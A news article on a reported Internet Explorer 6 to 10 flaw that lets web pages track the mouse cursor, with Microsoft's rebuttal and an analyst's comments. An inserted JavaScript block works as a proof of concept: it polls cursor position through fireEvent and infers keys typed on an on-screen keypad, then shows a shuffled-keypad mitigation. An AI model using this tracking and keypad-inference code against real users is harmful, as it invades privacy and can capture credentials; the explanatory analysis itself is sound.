
Microsoft: IE Mouse Tracking Exploit Poses "Little Risk"

Microsoft fired back at a report of an attack that allows people to track the position of a user's mouse cursor.

The issue was publicized by web analytics company Spider.io, which revealed that, using a few lines of JavaScript, an attacker can monitor the position of a target's cursor while they are using Internet Explorer. Microsoft and others, however, have argued that the firm is exaggerating the threat the behavior poses.

According to Spider.io, the issue, which affects Internet Explorer (IE) versions 6 through 10, is that IE's event model populates the global Event object (window.event) with attributes relating to mouse events.

"Combined with the ability to trigger events manually using the fireEvent() method, this allows JavaScript in any webpage (or in any iframe within any webpage) to poll for the position of the mouse cursor anywhere on the screen and at any time—even when the tab containing the page is not active, or when the Internet Explorer window is unfocused or minimized," the company explained in an advisory. "The fireEvent() method also exposes the status of the control, shift and alt keys."

"Affected properties of the Event object are altKey, altLeft, clientX, clientY, ctrlKey, ctrlLeft, offsetX, offsetY, screenX, screenY, shiftKey, shiftLeft, x and y," according to the advisory.

The behavior is already being exploited by at least two display ad analytics companies across billions of page impressions per month, the company noted, adding that the vulnerability is "particularly troubling" because it compromises the security of virtual keyboards and keypads.

Though Microsoft is working to adjust this behavior in IE, the underlying issue has more to do with competition between analytics companies than consumer safety or privacy, argued Microsoft's Dean Hachamovitch, corporate vice president, Internet Explorer, in a blog post.

"The only reported active use of this behavior involves competitors to Spider.io providing analytics," he blogged, noting that different analytics companies use different means to gather consumer information across browsers and devices.

"Online advertisers started a shift “from a ‘served’ to a ‘viewable’ impression[s],”" he blogged. "Many different analytics companies stepped up to compete in this space. That competition has had many public results, including lawsuits. One of the companies involved in this space is Spider.io, which recently reported an issue in IE involving mouse pointer information. Spider.io is an advertising analytics company. Their recent blog post, “There are two ways to measure ad viewability. There is only one right way,” makes their point of view very clear. Different analytics companies use different and equivalent methods to gather consumer information across different browsers on different devices."

For the exploit Spider.io describes to be successful, "the browser stars all seem to need to be in alignment to be able to target an individual," Paul Henry, security and forensic analyst at Lumension, said in a statement.

"A hacker would need to know the users' exact screen resolution, the location of the virtual keyboard and the key layout being used," he said. "Yes, in a lab environment, it can be made to look spectacular, but in the real world, I question just how much of a threat to users this really is."

If a user changes any settings on their browser, this is no longer an issue, Henry added.

"For example, my bank uses a randomized keyboard on my banking application, so it wouldn’t be an issue there," he said.
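The polling Spider.io describes above, the keypad inference it warns about, and the randomized keyboard Henry says defeats it, as an added example that is not the advisory's proof of concept and not Spider.io's or Microsoft's code. The IE event calls follow the advisory's description of attachEvent/fireEvent and the global event object; the keypad size and position, the dwell heuristic used to guess presses, and the seeded shuffle are assumptions made for the demonstration. Part 1 only does anything in Internet Explorer 6 through 10; the rest runs anywhere.

```javascript
// Added example for this article (not Spider.io's proof of concept and not
// Microsoft's code). Part 1 is the IE-only polling the advisory describes;
// parts 2 and 3 use an assumed keypad geometry and an assumed dwell heuristic.

// --- Part 1: poll the cursor on IE 6-10 through the legacy event API ------
// fireEvent("onmousemove") synthesises an event; per the advisory, the event
// object handed to the handler still carries the cursor's real screenX/screenY
// and the ctrl/shift/alt state, regardless of focus. Returns null elsewhere.
function startCursorPolling(intervalMs, onSample) {
  if (typeof document === "undefined" || !document.body ||
      typeof document.body.fireEvent !== "function") return null;
  var target = document.body;
  target.attachEvent("onmousemove", function (e) {
    e = e || window.event;
    onSample({ x: e.screenX, y: e.screenY,
               ctrl: e.ctrlKey, shift: e.shiftKey, alt: e.altKey });
  });
  return setInterval(function () { target.fireEvent("onmousemove"); }, intervalMs);
}

// --- Part 2: map a trace onto a keypad whose geometry the attacker knows ---
// Constructed keypad: 3 x 4 keys of 60 x 60 px, top-left at screen (400, 300).
// Resolution, position and layout are exactly what Henry says must be known.
var KEY_W = 60, KEY_H = 60, PAD_X = 400, PAD_Y = 300;
var DEFAULT_LABELS = ["1","2","3","4","5","6","7","8","9","*","0","#"];

function buildLayout(labels) {
  return labels.map(function (label, i) {
    return { label: label, x: PAD_X + (i % 3) * KEY_W,
             y: PAD_Y + Math.floor(i / 3) * KEY_H, w: KEY_W, h: KEY_H };
  });
}

function keyAt(layout, x, y) {
  for (var i = 0; i < layout.length; i++) {
    var k = layout[i];
    if (x >= k.x && x < k.x + k.w && y >= k.y && y < k.y + k.h) return k.label;
  }
  return null;
}

// The exposed properties include no button state, so a press is inferred
// from dwell: `minSamples` consecutive samples on one key (assumed heuristic).
function inferKeys(trace, layout, minSamples) {
  var pressed = [], current = null, run = 0;
  for (var i = 0; i < trace.length; i++) {
    var label = keyAt(layout, trace[i].x, trace[i].y);
    if (label === current) run++; else { current = label; run = 1; }
    if (label !== null && run === minSamples) pressed.push(label);
  }
  return pressed.join("");
}

// --- Part 3: the mitigation Henry mentions, a keypad with shuffled keys ----
// Seeded LCG keeps the demo deterministic; real code would use a CSPRNG.
function lcg(seed) {
  var s = seed >>> 0;
  return function () {
    s = (Math.imul(s, 1664525) + 1013904223) >>> 0;
    return s / 4294967296;
  };
}

// Fisher-Yates, repeated until every key has moved, so a map of the default
// layout is wrong at every position (a demo choice, not a real requirement).
function randomizedLayout(labels, rand) {
  var order;
  do {
    order = labels.slice();
    for (var i = order.length - 1; i > 0; i--) {
      var j = Math.floor(rand() * (i + 1));
      var t = order[i]; order[i] = order[j]; order[j] = t;
    }
  } while (order.some(function (l, i) { return l === labels[i]; }));
  return buildLayout(order);
}

// Constructed trace (one sample per poll): rest on "1", slide across "2",
// rest on "3", then rest on "7" in the default layout.
function sampleTrace() {
  var t = [];
  function dwell(x, y, n) { for (var i = 0; i < n; i++) t.push({ x: x, y: y }); }
  dwell(430, 330, 5); dwell(500, 330, 1); dwell(550, 330, 5); dwell(430, 450, 5);
  return t;
}

// Attacker reads the trace against the default layout; the user actually
// typed on a shuffled one, so the recovered "137" is wrong in every digit.
function demo() {
  var trace = sampleTrace();
  return {
    attackerGuess: inferKeys(trace, buildLayout(DEFAULT_LABELS), 3),
    actualKeys: inferKeys(trace, randomizedLayout(DEFAULT_LABELS, lcg(7)), 3)
  };
}
```

Calling `demo()` returns the attacker's reconstruction ("137" against the default keypad) alongside the keys actually pressed on the shuffled keypad, which differ in every position. In IE 6 through 10, `startCursorPolling(100, console.log)` logs a sample every 100 ms even while the window is unfocused, which is the behavior the advisory reports; in any other browser it returns null without doing anything.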

The theoretical use of this behavior to compromise consumer safety is something Microsoft’s security team has discussed with researchers across the industry, noted Hachamovitch.

"We take these risks very seriously," he wrote. "Getting all the pieces to line up in order to take advantage of this behavior – serving an ad to a site that asks for a logon, the user using an on screen (or virtual) keyboard, knowing how that onscreen keyboard works – is hard to imagine. From investigating the specific behavior when mouse position data is visible outside the browser window, sites can view only the mouse state; they cannot view the actual content that the user is interacting with. From our conversations with security researchers across the industry, we see very little risk to consumers at this time."
